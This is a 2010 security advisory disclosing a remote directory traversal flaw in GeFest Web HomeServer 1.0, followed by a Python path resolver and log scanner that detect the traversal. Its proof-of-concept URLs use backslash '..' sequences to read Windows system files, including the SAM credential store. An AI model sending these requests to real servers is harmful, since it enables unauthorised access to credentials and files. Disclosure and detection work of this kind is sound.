CORELAN-10-010 - GeFest Web HomeServer v1.0 Remote Directory Traversal Vulnerability



|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@xxxxxxxxxx |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|

Advisory : CORELAN-10-010
Disclosure date : February 8th, 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : GeFest Web HomeServer
[*] Version : 1.0
[*] URL : http://clearweb.org.ua/
[*] Platform : Windows
[*] Type of vulnerability : Remote Directory Traversal
[*] Risk rating : High (possible access to sensitive files)
[*] Issue fixed in version : 1.2
[*] Vulnerability discovered by : MarkoT
[*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse, MarkoT,
sinn3r, Jacky 'Redsees' & jnz


0x01 : Vendor description of software
-------------------------------------
From the vendor website:

"""Gefest Web Home Server is a simple web server with a graphical user interface.
The server allows watching video directly from another PC.
The server allows creating software storage.
The server supports password protection.
The server allows reviewing all user activity (Server log and Activity log).
Share your folders on the internet or a local network.
Add / remove folders using a simple interface."""


0x02 : Vulnerability details
----------------------------
By default, the utility runs as a desktop application, and it is very likely that users will run it with administrator privileges, so the web server process inherits those rights.
The discovered vulnerability allows an unauthenticated remote attacker to read files outside of the web application root by sending directory traversal sequences (backslash-separated "..") in the request path.

PoC :
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\calc.exe
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\config\sam
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32
http://192.168.1.200:8080/\../\../\../boot.ini
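The PoC requests above work because the server treats "\" as a path separator and lets ".." walk above the shared folder. The following Python is an added example, not code from the advisory or from GeFest: a root-anchored path resolver that rejects such requests (including percent-encoded backslashes), plus a scan of constructed access-log lines that flags the requests a defender would want to alert on. The share root, log format and log lines are assumptions for the example.

```python
from urllib.parse import unquote

# Constructed share root for this example; the advisory does not state GeFest's real root.
WEB_ROOT = "C:/GefestShare"


def resolve_within_root(raw_path, web_root=WEB_ROOT):
    """Map a requested URL path onto the share root, or return None if the
    request would escape it. The advisory's payloads rely on '\\' acting as a
    separator on Windows and on '..' climbing above the root, so both are
    handled explicitly instead of trusting a library normaliser (which
    silently drops leading '..' components at '/' and hides the traversal)."""
    # Decode twice so %5c or %255c cannot smuggle a separator past the check.
    path = unquote(unquote(raw_path)).split("?", 1)[0]
    if "\0" in path:
        return None
    parts = []
    for comp in path.replace("\\", "/").split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:          # climbed above the root: the bug on this page
                return None
            parts.pop()
            continue
        if ":" in comp:            # drive letter or NTFS alternate data stream
            return None
        parts.append(comp)
    if not parts:
        return web_root
    return web_root + "/" + "/".join(parts)


def flag_traversal_requests(access_log):
    """Return the request paths in a web-server log that would escape the root.
    Assumes common log format: client - - [time] "METHOD path HTTP/1.x" status size."""
    flagged = []
    for line in access_log.splitlines():
        try:
            request = line.split('"')[1]        # METHOD path HTTP/x
            path = request.split(" ")[1]
        except IndexError:
            continue                             # malformed line, skip it
        if resolve_within_root(path) is None:
            flagged.append(path)
    return flagged


# Constructed sample log lines; the first mirrors the PoC URL from the advisory.
SAMPLE_LOG = r'''192.168.1.50 - - [08/Feb/2010:10:00:01 +0100] "GET /\../\../\../boot.ini HTTP/1.1" 200 312
192.168.1.51 - - [08/Feb/2010:10:00:02 +0100] "GET /movies/index.html HTTP/1.1" 200 1984
192.168.1.52 - - [08/Feb/2010:10:00:03 +0100] "GET /%5c..%5c..%5cWINDOWS%5cSYSTEM32%5cconfig%5csam HTTP/1.1" 404 0'''
```

Running `flag_traversal_requests(SAMPLE_LOG)` flags the first and third requests and leaves the legitimate `/movies/index.html` alone.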



0x03 : Vendor communication
---------------------------
[*] February 4th, 2010 - Vendor contacted
[*] February 5th, 2010 - Version 1.20 released
[*] February 8th, 2010 - Public disclosure


